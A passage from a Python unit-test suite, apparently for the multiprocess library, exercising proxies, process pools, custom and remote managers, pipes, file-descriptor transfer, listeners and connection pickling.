self.assertEqual(list(it), list(range(10))) self.assertEqual(list(it), []) # exhausted # list modified during iteration it = iter(a) a[0] = 100 self.assertEqual(next(it), 100) def _test_list_proxy_in_list(self): a = self.list([self.list(range(3)) for _i in range(3)]) self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3) a[0][-1] = 55 self.assertEqual(a[0][:], [0, 1, 55]) for i in range(1, 3): self.assertEqual(a[i][:], [0, 1, 2]) self.assertEqual(a[1].pop(), 2) self.assertEqual(len(a[1]), 2) for i in range(0, 3, 2): self.assertEqual(len(a[i]), 3) del a b = self.list() b.append(b) del b def test_dict(self): d = self.dict() indices = list(range(65, 70)) for i in indices: d[i] = chr(i) self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices)) self.assertEqual(sorted(d.keys()), indices) self.assertEqual(sorted(d.values()), [chr(i) for i in indices]) self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices]) def test_dict_iter(self): d = self.dict() indices = list(range(65, 70)) for i in indices: d[i] = chr(i) it = iter(d) self.assertEqual(list(it), indices) self.assertEqual(list(it), []) # exhausted # dictionary changed size during iteration it = iter(d) d.clear() self.assertRaises(RuntimeError, next, it) def _test_dict_proxy_nested(self): pets = self.dict(ferrets=2, hamsters=4) supplies = self.dict(water=10, feed=3) d = self.dict(pets=pets, supplies=supplies) self.assertEqual(supplies['water'], 10) self.assertEqual(d['supplies']['water'], 10) d['supplies']['blankets'] = 5 self.assertEqual(supplies['blankets'], 5) self.assertEqual(d['supplies']['blankets'], 5) d['supplies']['water'] = 7 self.assertEqual(supplies['water'], 7) self.assertEqual(d['supplies']['water'], 7) del pets del supplies self.assertEqual(d['pets']['ferrets'], 2) d['supplies']['blankets'] = 11 self.assertEqual(d['supplies']['blankets'], 11) pets = d['pets'] supplies = d['supplies'] supplies['water'] = 7 self.assertEqual(supplies['water'], 7) self.assertEqual(d['supplies']['water'], 7) d.clear() self.assertEqual(len(d), 0) self.assertEqual(supplies['water'], 7) self.assertEqual(pets['hamsters'], 4) l = self.list([pets, supplies]) l[0]['marmots'] = 1 self.assertEqual(pets['marmots'], 1) self.assertEqual(l[0]['marmots'], 1) del pets del supplies self.assertEqual(l[0]['marmots'], 1) outer = self.list([[88, 99], l]) self.assertIsInstance(outer[0], list) # Not a ListProxy self.assertEqual(outer[-1][-1]['feed'], 3) def test_namespace(self): n = self.Namespace() n.name = 'Bob' n.job = 'Builder' n._hidden = 'hidden' self.assertEqual((n.name, n.job), ('Bob', 'Builder')) del n.job self.assertEqual(str(n), "Namespace(name='Bob')") self.assertTrue(hasattr(n, 'name')) self.assertTrue(not hasattr(n, 'job')) # # # def sqr(x, wait=0.0): time.sleep(wait) return x*x def mul(x, y): return x*y def raise_large_valuerror(wait): time.sleep(wait) raise ValueError("x" * 1024**2) def identity(x): return x class CountedObject(object): n_instances = 0 def __new__(cls): cls.n_instances += 1 return object.__new__(cls) def __del__(self): type(self).n_instances -= 1 class SayWhenError(ValueError): pass def exception_throwing_generator(total, when): if when == -1: raise SayWhenError("Somebody said when") for i in range(total): if i == when: raise SayWhenError("Somebody said when") yield i class _TestPool(BaseTestCase): @classmethod def setUpClass(cls): super().setUpClass() cls.pool = cls.Pool(4) @classmethod def tearDownClass(cls): cls.pool.terminate() cls.pool.join() cls.pool = None super().tearDownClass() def test_apply(self): papply = self.pool.apply self.assertEqual(papply(sqr, (5,)), sqr(5)) self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3)) def test_map(self): pmap = self.pool.map self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10))))) self.assertEqual(pmap(sqr, list(range(100)), chunksize=20), list(map(sqr, list(range(100))))) def test_starmap(self): psmap = self.pool.starmap tuples = list(zip(range(10), range(9,-1, -1))) self.assertEqual(psmap(mul, tuples), list(itertools.starmap(mul, tuples))) tuples = list(zip(range(100), range(99,-1, -1))) self.assertEqual(psmap(mul, tuples, chunksize=20), list(itertools.starmap(mul, tuples))) def test_starmap_async(self): tuples = list(zip(range(100), range(99,-1, -1))) self.assertEqual(self.pool.starmap_async(mul, tuples).get(), list(itertools.starmap(mul, tuples))) def test_map_async(self): self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(), list(map(sqr, list(range(10))))) def _test_map_async_callbacks(self): call_args = self.manager.list() if self.TYPE == 'manager' else [] self.pool.map_async(int, ['1'], callback=call_args.append, error_callback=call_args.append).wait() self.assertEqual(1, len(call_args)) self.assertEqual([1], call_args[0]) self.pool.map_async(int, ['a'], callback=call_args.append, error_callback=call_args.append).wait() self.assertEqual(2, len(call_args)) self.assertIsInstance(call_args[1], ValueError) def test_map_unplicklable(self): # Issue #19425 -- failure to pickle should not cause a hang if self.TYPE == 'threads': self.skipTest('test not appropriate for {}'.format(self.TYPE)) class A(object): def __reduce__(self): raise RuntimeError('cannot pickle') with self.assertRaises(RuntimeError): self.pool.map(sqr, [A()]*10) def test_map_chunksize(self): try: self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1) except multiprocess.TimeoutError: self.fail("pool.map_async with chunksize stalled on null list") def test_map_handle_iterable_exception(self): if self.TYPE == 'manager': self.skipTest('test not appropriate for {}'.format(self.TYPE)) # SayWhenError seen at the very first of the iterable with self.assertRaises(SayWhenError): self.pool.map(sqr, exception_throwing_generator(1, -1), 1) # again, make sure it's reentrant with self.assertRaises(SayWhenError): self.pool.map(sqr, exception_throwing_generator(1, -1), 1) with self.assertRaises(SayWhenError): self.pool.map(sqr, exception_throwing_generator(10, 3), 1) class SpecialIterable: def __iter__(self): return self def __next__(self): raise SayWhenError def __len__(self): return 1 with self.assertRaises(SayWhenError): self.pool.map(sqr, SpecialIterable(), 1) with self.assertRaises(SayWhenError): self.pool.map(sqr, SpecialIterable(), 1) def test_async(self): res = self.pool.apply_async(sqr, (7, TIMEOUT1,)) get = TimingWrapper(res.get) self.assertEqual(get(), 49) self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1) def test_async_timeout(self): res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0)) get = TimingWrapper(res.get) self.assertRaises(multiprocess.TimeoutError, get, timeout=TIMEOUT2) self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2) def test_imap(self): it = self.pool.imap(sqr, list(range(10))) self.assertEqual(list(it), list(map(sqr, list(range(10))))) it = self.pool.imap(sqr, list(range(10))) for i in range(10): self.assertEqual(next(it), i*i) self.assertRaises(StopIteration, it.__next__) it = self.pool.imap(sqr, list(range(1000)), chunksize=100) for i in range(1000): self.assertEqual(next(it), i*i) self.assertRaises(StopIteration, it.__next__) def test_imap_handle_iterable_exception(self): if self.TYPE == 'manager': self.skipTest('test not appropriate for {}'.format(self.TYPE)) # SayWhenError seen at the very first of the iterable it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1) self.assertRaises(SayWhenError, it.__next__) # again, make sure it's reentrant it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1) self.assertRaises(SayWhenError, it.__next__) it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1) for i in range(3): self.assertEqual(next(it), i*i) self.assertRaises(SayWhenError, it.__next__) # SayWhenError seen at start of problematic chunk's results it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2) for i in range(6): self.assertEqual(next(it), i*i) self.assertRaises(SayWhenError, it.__next__) it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4) for i in range(4): self.assertEqual(next(it), i*i) self.assertRaises(SayWhenError, it.__next__) def test_imap_unordered(self): it = self.pool.imap_unordered(sqr, list(range(10))) self.assertEqual(sorted(it), list(map(sqr, list(range(10))))) it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100) self.assertEqual(sorted(it), list(map(sqr, list(range(1000))))) def test_imap_unordered_handle_iterable_exception(self): if self.TYPE == 'manager': self.skipTest('test not appropriate for {}'.format(self.TYPE)) # SayWhenError seen at the very first of the iterable it = self.pool.imap_unordered(sqr, exception_throwing_generator(1, -1), 1) self.assertRaises(SayWhenError, it.__next__) # again, make sure it's reentrant it = self.pool.imap_unordered(sqr, exception_throwing_generator(1, -1), 1) self.assertRaises(SayWhenError, it.__next__) it = self.pool.imap_unordered(sqr, exception_throwing_generator(10, 3), 1) expected_values = list(map(sqr, list(range(10)))) with self.assertRaises(SayWhenError): # imap_unordered makes it difficult to anticipate the SayWhenError for i in range(10): value = next(it) self.assertIn(value, expected_values) expected_values.remove(value) it = self.pool.imap_unordered(sqr, exception_throwing_generator(20, 7), 2) expected_values = list(map(sqr, list(range(20)))) with self.assertRaises(SayWhenError): for i in range(20): value = next(it) self.assertIn(value, expected_values) expected_values.remove(value) def test_make_pool(self): expected_error = (RemoteError if self.TYPE == 'manager' else ValueError) self.assertRaises(expected_error, self.Pool, -1) self.assertRaises(expected_error, self.Pool, 0) if self.TYPE != 'manager': p = self.Pool(3) try: self.assertEqual(3, len(p._pool)) finally: p.close() p.join() def test_terminate(self): result = self.pool.map_async( time.sleep, [0.1 for i in range(10000)], chunksize=1 ) self.pool.terminate() join = TimingWrapper(self.pool.join) join() # Sanity check the pool didn't wait for all tasks to finish self.assertLess(join.elapsed, 2.0) def test_empty_iterable(self): # See Issue 12157 p = self.Pool(1) self.assertEqual(p.map(sqr, []), []) self.assertEqual(list(p.imap(sqr, [])), []) self.assertEqual(list(p.imap_unordered(sqr, [])), []) self.assertEqual(p.map_async(sqr, []).get(), []) p.close() p.join() def test_context(self): if self.TYPE == 'processes': L = list(range(10)) expected = [sqr(i) for i in L] with self.Pool(2) as p: r = p.map_async(sqr, L) self.assertEqual(r.get(), expected) p.join() self.assertRaises(ValueError, p.map_async, sqr, L) @classmethod def _test_traceback(cls): raise RuntimeError(123) # some comment @unittest.skipIf(True, "fails with is_dill(obj, child=True)") def test_traceback(self): # We want ensure that the traceback from the child process is # contained in the traceback raised in the main process. if self.TYPE == 'processes': with self.Pool(1) as p: try: p.apply(self._test_traceback) except Exception as e: exc = e else: self.fail('expected RuntimeError') p.join() self.assertIs(type(exc), RuntimeError) self.assertEqual(exc.args, (123,)) cause = exc.__cause__ self.assertIs(type(cause), multiprocess.pool.RemoteTraceback) self.assertIn('raise RuntimeError(123) # some comment', cause.tb) with support.captured_stderr() as f1: try: raise exc except RuntimeError: sys.excepthook(*sys.exc_info()) self.assertIn('raise RuntimeError(123) # some comment', f1.getvalue()) # _helper_reraises_exception should not make the error # a remote exception with self.Pool(1) as p: try: p.map(sqr, exception_throwing_generator(1, -1), 1) except Exception as e: exc = e else: self.fail('expected SayWhenError') self.assertIs(type(exc), SayWhenError) self.assertIs(exc.__cause__, None) p.join() @classmethod def _test_wrapped_exception(cls): raise RuntimeError('foo') @unittest.skipIf(True, "fails with is_dill(obj, child=True)") def test_wrapped_exception(self): # Issue #20980: Should not wrap exception when using thread pool with self.Pool(1) as p: with self.assertRaises(RuntimeError): p.apply(self._test_wrapped_exception) p.join() def _test_map_no_failfast(self): # Issue #23992: the fail-fast behaviour when an exception is raised # during map() would make Pool.join() deadlock, because a worker # process would fill the result queue (after the result handler thread # terminated, hence not draining it anymore). t_start = time.time() with self.assertRaises(ValueError): with self.Pool(2) as p: try: p.map(raise_large_valuerror, [0, 1]) finally: time.sleep(0.5) p.close() p.join() # check that we indeed waited for all jobs self.assertGreater(time.time() - t_start, 0.9) def test_release_task_refs(self): # Issue #29861: task arguments and results should not be kept # alive after we are done with them. objs = [CountedObject() for i in range(10)] refs = [weakref.ref(o) for o in objs] self.pool.map(identity, objs) del objs time.sleep(DELTA) # let threaded cleanup code run self.assertEqual(set(wr() for wr in refs), {None}) # With a process pool, copies of the objects are returned, check # they were released too. self.assertEqual(CountedObject.n_instances, 0) def raising(): raise KeyError("key") def unpickleable_result(): return lambda: 42 class _TestPoolWorkerErrors(BaseTestCase): ALLOWED_TYPES = ('processes', ) def test_async_error_callback(self): p = multiprocess.Pool(2) scratchpad = [None] def errback(exc): scratchpad[0] = exc res = p.apply_async(raising, error_callback=errback) self.assertRaises(KeyError, res.get) self.assertTrue(scratchpad[0]) self.assertIsInstance(scratchpad[0], KeyError) p.close() p.join() def _test_unpickleable_result(self): from multiprocess.pool import MaybeEncodingError p = multiprocess.Pool(2) # Make sure we don't lose pool processes because of encoding errors. for iteration in range(20): scratchpad = [None] def errback(exc): scratchpad[0] = exc res = p.apply_async(unpickleable_result, error_callback=errback) self.assertRaises(MaybeEncodingError, res.get) wrapped = scratchpad[0] self.assertTrue(wrapped) self.assertIsInstance(scratchpad[0], MaybeEncodingError) self.assertIsNotNone(wrapped.exc) self.assertIsNotNone(wrapped.value) p.close() p.join() class _TestPoolWorkerLifetime(BaseTestCase): ALLOWED_TYPES = ('processes', ) def test_pool_worker_lifetime(self): p = multiprocess.Pool(3, maxtasksperchild=10) self.assertEqual(3, len(p._pool)) origworkerpids = [w.pid for w in p._pool] # Run many tasks so each worker gets replaced (hopefully) results = [] for i in range(100): results.append(p.apply_async(sqr, (i, ))) # Fetch the results and verify we got the right answers, # also ensuring all the tasks have completed. for (j, res) in enumerate(results): self.assertEqual(res.get(), sqr(j)) # Refill the pool p._repopulate_pool() # Wait until all workers are alive # (countdown * DELTA = 5 seconds max startup process time) countdown = 50 while countdown and not all(w.is_alive() for w in p._pool): countdown -= 1 time.sleep(DELTA) finalworkerpids = [w.pid for w in p._pool] # All pids should be assigned. See issue #7805. self.assertNotIn(None, origworkerpids) self.assertNotIn(None, finalworkerpids) # Finally, check that the worker pids have changed self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids)) p.close() p.join() def test_pool_worker_lifetime_early_close(self): # Issue #10332: closing a pool whose workers have limited lifetimes # before all the tasks completed would make join() hang. p = multiprocess.Pool(3, maxtasksperchild=1) results = [] for i in range(6): results.append(p.apply_async(sqr, (i, 0.3))) p.close() p.join() # check the results for (j, res) in enumerate(results): self.assertEqual(res.get(), sqr(j)) # # Test of creating a customized manager class # from multiprocess.managers import BaseManager, BaseProxy, RemoteError class FooBar(object): def f(self): return 'f()' def g(self): raise ValueError def _h(self): return '_h()' def baz(): for i in range(10): yield i*i class IteratorProxy(BaseProxy): _exposed_ = ('__next__',) def __iter__(self): return self def __next__(self): return self._callmethod('__next__') class MyManager(BaseManager): pass MyManager.register('Foo', callable=FooBar) MyManager.register('Bar', callable=FooBar, exposed=('f', '_h')) MyManager.register('baz', callable=baz, proxytype=IteratorProxy) class _TestMyManager(BaseTestCase): ALLOWED_TYPES = ('manager',) def test_mymanager(self): manager = MyManager() manager.start() self.common(manager) manager.shutdown() # If the manager process exited cleanly then the exitcode # will be zero. Otherwise (after a short timeout) # terminate() is used, resulting in an exitcode of -SIGTERM. self.assertEqual(manager._process.exitcode, 0) def test_mymanager_context(self): with MyManager() as manager: self.common(manager) # bpo-30356: BaseManager._finalize_manager() sends SIGTERM # to the manager process if it takes longer than 1 second to stop. self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM)) def test_mymanager_context_prestarted(self): manager = MyManager() manager.start() with manager: self.common(manager) self.assertEqual(manager._process.exitcode, 0) def common(self, manager): foo = manager.Foo() bar = manager.Bar() baz = manager.baz() foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)] bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)] self.assertEqual(foo_methods, ['f', 'g']) self.assertEqual(bar_methods, ['f', '_h']) self.assertEqual(foo.f(), 'f()') self.assertRaises(ValueError, foo.g) self.assertEqual(foo._callmethod('f'), 'f()') self.assertRaises(RemoteError, foo._callmethod, '_h') self.assertEqual(bar.f(), 'f()') self.assertEqual(bar._h(), '_h()') self.assertEqual(bar._callmethod('f'), 'f()') self.assertEqual(bar._callmethod('_h'), '_h()') self.assertEqual(list(baz), [i*i for i in range(10)]) # # Test of connecting to a remote server and using xmlrpclib for serialization # _queue = pyqueue.Queue() def get_queue(): return _queue class QueueManager(BaseManager): '''manager class used by server process''' QueueManager.register('get_queue', callable=get_queue) class QueueManager2(BaseManager): '''manager class which specifies the same interface as QueueManager''' QueueManager2.register('get_queue') SERIALIZER = 'xmlrpclib' class _TestRemoteManager(BaseTestCase): ALLOWED_TYPES = ('manager',) values = ['hello world', None, True, 2.25, 'hall\xe5 v\xe4rlden', '\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442', b'hall\xe5 v\xe4rlden', ] result = values[:] @classmethod def _putter(cls, address, authkey): manager = QueueManager2( address=address, authkey=authkey, serializer=SERIALIZER ) manager.connect() queue = manager.get_queue() # Note that xmlrpclib will deserialize object as a list not a tuple queue.put(tuple(cls.values)) def test_remote(self): authkey = os.urandom(32) manager = QueueManager( address=(support.HOST, 0), authkey=authkey, serializer=SERIALIZER ) manager.start() p = self.Process(target=self._putter, args=(manager.address, authkey)) p.daemon = True p.start() manager2 = QueueManager2( address=manager.address, authkey=authkey, serializer=SERIALIZER ) manager2.connect() queue = manager2.get_queue() self.assertEqual(queue.get(), self.result) # Because we are using xmlrpclib for serialization instead of # pickle this will cause a serialization error. self.assertRaises(Exception, queue.put, time.sleep) # Make queue finalizer run before the server is stopped del queue manager.shutdown() class _TestManagerRestart(BaseTestCase): @classmethod def _putter(cls, address, authkey): manager = QueueManager( address=address, authkey=authkey, serializer=SERIALIZER) manager.connect() queue = manager.get_queue() queue.put('hello world') def test_rapid_restart(self): authkey = os.urandom(32) manager = QueueManager( address=(support.HOST, 0), authkey=authkey, serializer=SERIALIZER) srvr = manager.get_server() addr = srvr.address # Close the connection.Listener socket which gets opened as a part # of manager.get_server(). It's not needed for the test. srvr.listener.close() manager.start() p = self.Process(target=self._putter, args=(manager.address, authkey)) p.start() p.join() queue = manager.get_queue() self.assertEqual(queue.get(), 'hello world') del queue manager.shutdown() manager = QueueManager( address=addr, authkey=authkey, serializer=SERIALIZER) try: manager.start() except OSError as e: if e.errno != errno.EADDRINUSE: raise # Retry after some time, in case the old socket was lingering # (sporadic failure on buildbots) time.sleep(1.0) manager = QueueManager( address=addr, authkey=authkey, serializer=SERIALIZER) manager.shutdown() # # # SENTINEL = latin('') class _TestConnection(BaseTestCase): ALLOWED_TYPES = ('processes', 'threads') @classmethod def _echo(cls, conn): for msg in iter(conn.recv_bytes, SENTINEL): conn.send_bytes(msg) conn.close() def test_connection(self): conn, child_conn = self.Pipe() p = self.Process(target=self._echo, args=(child_conn,)) p.daemon = True p.start() seq = [1, 2.25, None] msg = latin('hello world') longmsg = msg * 10 arr = array.array('i', list(range(4))) if self.TYPE == 'processes': self.assertEqual(type(conn.fileno()), int) self.assertEqual(conn.send(seq), None) self.assertEqual(conn.recv(), seq) self.assertEqual(conn.send_bytes(msg), None) self.assertEqual(conn.recv_bytes(), msg) if self.TYPE == 'processes': buffer = array.array('i', [0]*10) expected = list(arr) + [0] * (10 - len(arr)) self.assertEqual(conn.send_bytes(arr), None) self.assertEqual(conn.recv_bytes_into(buffer), len(arr) * buffer.itemsize) self.assertEqual(list(buffer), expected) buffer = array.array('i', [0]*10) expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr)) self.assertEqual(conn.send_bytes(arr), None) self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize), len(arr) * buffer.itemsize) self.assertEqual(list(buffer), expected) buffer = bytearray(latin(' ' * 40)) self.assertEqual(conn.send_bytes(longmsg), None) try: res = conn.recv_bytes_into(buffer) except multiprocess.BufferTooShort as e: self.assertEqual(e.args, (longmsg,)) else: self.fail('expected BufferTooShort, got %s' % res) poll = TimingWrapper(conn.poll) self.assertEqual(poll(), False) self.assertTimingAlmostEqual(poll.elapsed, 0) self.assertEqual(poll(-1), False) self.assertTimingAlmostEqual(poll.elapsed, 0) self.assertEqual(poll(TIMEOUT1), False) self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1) conn.send(None) time.sleep(.1) self.assertEqual(poll(TIMEOUT1), True) self.assertTimingAlmostEqual(poll.elapsed, 0) self.assertEqual(conn.recv(), None) really_big_msg = latin('X') * (1024 * 1024 * 16) # 16Mb conn.send_bytes(really_big_msg) self.assertEqual(conn.recv_bytes(), really_big_msg) conn.send_bytes(SENTINEL) # tell child to quit child_conn.close() if self.TYPE == 'processes': self.assertEqual(conn.readable, True) self.assertEqual(conn.writable, True) self.assertRaises(EOFError, conn.recv) self.assertRaises(EOFError, conn.recv_bytes) p.join() def test_duplex_false(self): reader, writer = self.Pipe(duplex=False) self.assertEqual(writer.send(1), None) self.assertEqual(reader.recv(), 1) if self.TYPE == 'processes': self.assertEqual(reader.readable, True) self.assertEqual(reader.writable, False) self.assertEqual(writer.readable, False) self.assertEqual(writer.writable, True) self.assertRaises(OSError, reader.send, 2) self.assertRaises(OSError, writer.recv) self.assertRaises(OSError, writer.poll) def test_spawn_close(self): # We test that a pipe connection can be closed by parent # process immediately after child is spawned. On Windows this # would have sometimes failed on old versions because # child_conn would be closed before the child got a chance to # duplicate it. conn, child_conn = self.Pipe() p = self.Process(target=self._echo, args=(child_conn,)) p.daemon = True p.start() child_conn.close() # this might complete before child initializes msg = latin('hello') conn.send_bytes(msg) self.assertEqual(conn.recv_bytes(), msg) conn.send_bytes(SENTINEL) conn.close() p.join() def test_sendbytes(self): if self.TYPE != 'processes': self.skipTest('test not appropriate for {}'.format(self.TYPE)) msg = latin('abcdefghijklmnopqrstuvwxyz') a, b = self.Pipe() a.send_bytes(msg) self.assertEqual(b.recv_bytes(), msg) a.send_bytes(msg, 5) self.assertEqual(b.recv_bytes(), msg[5:]) a.send_bytes(msg, 7, 8) self.assertEqual(b.recv_bytes(), msg[7:7+8]) a.send_bytes(msg, 26) self.assertEqual(b.recv_bytes(), latin('')) a.send_bytes(msg, 26, 0) self.assertEqual(b.recv_bytes(), latin('')) self.assertRaises(ValueError, a.send_bytes, msg, 27) self.assertRaises(ValueError, a.send_bytes, msg, 22, 5) self.assertRaises(ValueError, a.send_bytes, msg, 26, 1) self.assertRaises(ValueError, a.send_bytes, msg, -1) self.assertRaises(ValueError, a.send_bytes, msg, 4, -1) @classmethod def _is_fd_assigned(cls, fd): try: os.fstat(fd) except OSError as e: if e.errno == errno.EBADF: return False raise else: return True @classmethod def _writefd(cls, conn, data, create_dummy_fds=False): if create_dummy_fds: for i in range(0, 256): if not cls._is_fd_assigned(i): os.dup2(conn.fileno(), i) fd = reduction.recv_handle(conn) if msvcrt: fd = msvcrt.open_osfhandle(fd, os.O_WRONLY) os.write(fd, data) os.close(fd) @unittest.skipUnless(HAS_REDUCTION, "test needs multiprocess.reduction") def test_fd_transfer(self): if self.TYPE != 'processes': self.skipTest("only makes sense with processes") conn, child_conn = self.Pipe(duplex=True) p = self.Process(target=self._writefd, args=(child_conn, b"foo")) p.daemon = True p.start() self.addCleanup(support.unlink, support.TESTFN) with open(support.TESTFN, "wb") as f: fd = f.fileno() if msvcrt: fd = msvcrt.get_osfhandle(fd) reduction.send_handle(conn, fd, p.pid) p.join() with open(support.TESTFN, "rb") as f: self.assertEqual(f.read(), b"foo") @unittest.skipUnless(HAS_REDUCTION, "test needs multiprocess.reduction") @unittest.skipIf(sys.platform == "win32", "test semantics don't make sense on Windows") @unittest.skipIf(MAXFD <= 256, "largest assignable fd number is too small") @unittest.skipUnless(hasattr(os, "dup2"), "test needs os.dup2()") def test_large_fd_transfer(self): # With fd > 256 (issue #11657) if self.TYPE != 'processes': self.skipTest("only makes sense with processes") conn, child_conn = self.Pipe(duplex=True) p = self.Process(target=self._writefd, args=(child_conn, b"bar", True)) p.daemon = True p.start() self.addCleanup(support.unlink, support.TESTFN) with open(support.TESTFN, "wb") as f: fd = f.fileno() for newfd in range(256, MAXFD): if not self._is_fd_assigned(newfd): break else: self.fail("could not find an unassigned large file descriptor") os.dup2(fd, newfd) try: reduction.send_handle(conn, newfd, p.pid) finally: os.close(newfd) p.join() with open(support.TESTFN, "rb") as f: self.assertEqual(f.read(), b"bar") @classmethod def _send_data_without_fd(self, conn): os.write(conn.fileno(), b"\0") @unittest.skipUnless(HAS_REDUCTION, "test needs multiprocess.reduction") @unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows") def test_missing_fd_transfer(self): # Check that exception is raised when received data is not # accompanied by a file descriptor in ancillary data. if self.TYPE != 'processes': self.skipTest("only makes sense with processes") conn, child_conn = self.Pipe(duplex=True) p = self.Process(target=self._send_data_without_fd, args=(child_conn,)) p.daemon = True p.start() self.assertRaises(RuntimeError, reduction.recv_handle, conn) p.join() def test_context(self): a, b = self.Pipe() with a, b: a.send(1729) self.assertEqual(b.recv(), 1729) if self.TYPE == 'processes': self.assertFalse(a.closed) self.assertFalse(b.closed) if self.TYPE == 'processes': self.assertTrue(a.closed) self.assertTrue(b.closed) self.assertRaises(OSError, a.recv) self.assertRaises(OSError, b.recv) class _TestListener(BaseTestCase): ALLOWED_TYPES = ('processes',) def test_multiple_bind(self): for family in self.connection.families: l = self.connection.Listener(family=family) self.addCleanup(l.close) self.assertRaises(OSError, self.connection.Listener, l.address, family) def test_context(self): with self.connection.Listener() as l: with self.connection.Client(l.address) as c: with l.accept() as d: c.send(1729) self.assertEqual(d.recv(), 1729) if self.TYPE == 'processes': self.assertRaises(OSError, l.accept) class _TestListenerClient(BaseTestCase): ALLOWED_TYPES = ('processes', 'threads') @classmethod def _test(cls, address): conn = cls.connection.Client(address) conn.send('hello') conn.close() def test_listener_client(self): for family in self.connection.families: l = self.connection.Listener(family=family) p = self.Process(target=self._test, args=(l.address,)) p.daemon = True p.start() conn = l.accept() self.assertEqual(conn.recv(), 'hello') p.join() l.close() def test_issue14725(self): l = self.connection.Listener() p = self.Process(target=self._test, args=(l.address,)) p.daemon = True p.start() time.sleep(1) # On Windows the client process should by now have connected, # written data and closed the pipe handle by now. This causes # ConnectNamdedPipe() to fail with ERROR_NO_DATA. See Issue # 14725. conn = l.accept() self.assertEqual(conn.recv(), 'hello') conn.close() p.join() l.close() def test_issue16955(self): for fam in self.connection.families: l = self.connection.Listener(family=fam) c = self.connection.Client(l.address) a = l.accept() a.send_bytes(b"hello") self.assertTrue(c.poll(1)) a.close() c.close() l.close() class _TestPoll(BaseTestCase): ALLOWED_TYPES = ('processes', 'threads') def test_empty_string(self): a, b = self.Pipe() self.assertEqual(a.poll(), False) b.send_bytes(b'') self.assertEqual(a.poll(), True) self.assertEqual(a.poll(), True) @classmethod def _child_strings(cls, conn, strings): for s in strings: time.sleep(0.1) conn.send_bytes(s) conn.close() def test_strings(self): strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop') a, b = self.Pipe() p = self.Process(target=self._child_strings, args=(b, strings)) p.start() for s in strings: for i in range(200): if a.poll(0.01): break x = a.recv_bytes() self.assertEqual(s, x) p.join() @classmethod def _child_boundaries(cls, r): # Polling may "pull" a message in to the child process, but we # don't want it to pull only part of a message, as that would # corrupt the pipe for any other processes which might later # read from it. r.poll(5) def test_boundaries(self): r, w = self.Pipe(False) p = self.Process(target=self._child_boundaries, args=(r,)) p.start() time.sleep(2) L = [b"first", b"second"] for obj in L: w.send_bytes(obj) w.close() p.join() self.assertIn(r.recv_bytes(), L) @classmethod def _child_dont_merge(cls, b): b.send_bytes(b'a') b.send_bytes(b'b') b.send_bytes(b'cd') def test_dont_merge(self): a, b = self.Pipe() self.assertEqual(a.poll(0.0), False) self.assertEqual(a.poll(0.1), False) p = self.Process(target=self._child_dont_merge, args=(b,)) p.start() self.assertEqual(a.recv_bytes(), b'a') self.assertEqual(a.poll(1.0), True) self.assertEqual(a.poll(1.0), True) self.assertEqual(a.recv_bytes(), b'b') self.assertEqual(a.poll(1.0), True) self.assertEqual(a.poll(1.0), True) self.assertEqual(a.poll(0.0), True) self.assertEqual(a.recv_bytes(), b'cd') p.join() # # Test of sending connection and socket objects between processes # @unittest.skipUnless(HAS_REDUCTION, "test needs multiprocess.reduction") class _TestPicklingConnections(BaseTestCase): ALLOWED_TYPES = ('processes',) @classmethod def tearDownClass(cls): from multiprocess import resource_sharer resource_sharer.stop(timeout=5) @classmethod def _listener(cls, conn, families): for fam in families: l = cls.connection.Listener(family=fam) conn.send(l.address) new_conn = l.accept() conn.send(new_conn) new_conn.close() l.close() l = socket.socket() l.bind((support.HOST, 0)) l.listen() conn.send(l.getsockname()) new_conn, addr = l.accept() conn.send(new_conn) new_conn.close() l.close() conn.recv() @classmethod def _remote(cls, conn): for (address, msg) in iter(conn.recv, None): client = cls.connection.Client(address) client.send(msg.upper()) client.close() address, msg = conn.recv() client = socket.socket() client.connect(address) client.sendall(msg.upper()) client.close() conn.close() def test_pickling(self): families = self.connection.families lconn, lconn0 = self.Pipe() lp = self.Process(target=self._listener, args=(lconn0, families)) lp.daemon = True lp.start() lconn0.close() rconn, rconn0 = self.Pipe() rp = self.Process(target=self._remote, args=(rconn0,)) rp.daemon = True rp.start() rconn0.close() for fam in families: msg = ('This connection uses family %s' % fam).encode('ascii') address = lconn.recv() rconn.send((address, msg)) new_conn = lconn.recv() self.assertEqual(new_conn.recv(), msg.upper()) rconn.send(None) msg = latin('This connection uses a normal socket') address = lconn.recv() rconn.send((address, msg)) new_conn = lconn.recv() buf = [] while True: s = new_conn.recv(100) if not s: break buf.append(s) buf = b''.join(buf) self.assertEqual(buf, msg.upper()) new_conn.close() lconn.send(None) rconn.close() lconn.close() lp.join() rp.join() @classmethod def child_access(cls, conn): w = conn.recv() w.send('all is well') w.close() r = conn.recv() msg = r.recv() conn.send(msg*2) conn.close() def test_access(self): # On Windows, if we do not specify a destination pid when # using DupHandle then we need to be careful to use the # correct access flags for DuplicateHandle(), or else # DupHandle.detach() will raise PermissionError. For example, # for a read only pipe handle we should use # access=FILE_GENERIC_READ. (Unfortunately # DUPLICATE_SAME_ACCESS does not work.) conn, child_conn = self.Pipe() p = self.Process(target=self.child_access, args=(child_conn,)) p.daemon = True p.start() child_conn.close() r, w = 